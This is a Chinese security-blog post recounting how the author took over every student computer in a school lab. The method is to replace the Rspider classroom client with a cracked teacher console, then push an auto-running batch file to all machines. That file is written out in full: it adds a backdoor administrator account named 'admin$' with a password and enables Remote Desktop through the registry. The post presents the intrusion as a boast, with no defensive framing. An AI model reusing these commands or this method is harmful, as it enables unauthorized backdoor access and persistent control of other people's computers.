最新消息:

三次渗透之利用Rspider拿下全部学生机

WEB安全 Eternal 1356浏览 0评论

00×01

在经过二次渗透拿下官网服务器的权限后,作为“好学生“的我就把魔爪对准了内网~~~

首先,从教室开始入口吧- -#

00×02

首先需要卸载原来 Rspider 中的学生端:

 

然后在安装教师机:

 

安装完成后是不可以打开的,所以需要先使用破解补丁替换 monitorRspider 文件,出现下图表示就是可以使用了。

 

 

可以看见,这里有多少个就代表着有多少个开机 。

 

选择文件传输,当然前提我们需要先准备好一个bat文件 。

内容:

net user admin$ qwe123!@# /add

net localgroup administrators admin$ /add

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

意义就是添加一个 admin$ 用户,然后添加到用户组,然后在开启 3389

 

注意,要让他直接运行才可以!

传送成功,那么就可以登录服务器了。

我就不一台台登录了~~~

转载请注明:即刻安全 » 三次渗透之利用Rspider拿下全部学生机

您必须 登录 才能发表评论!

合作伙伴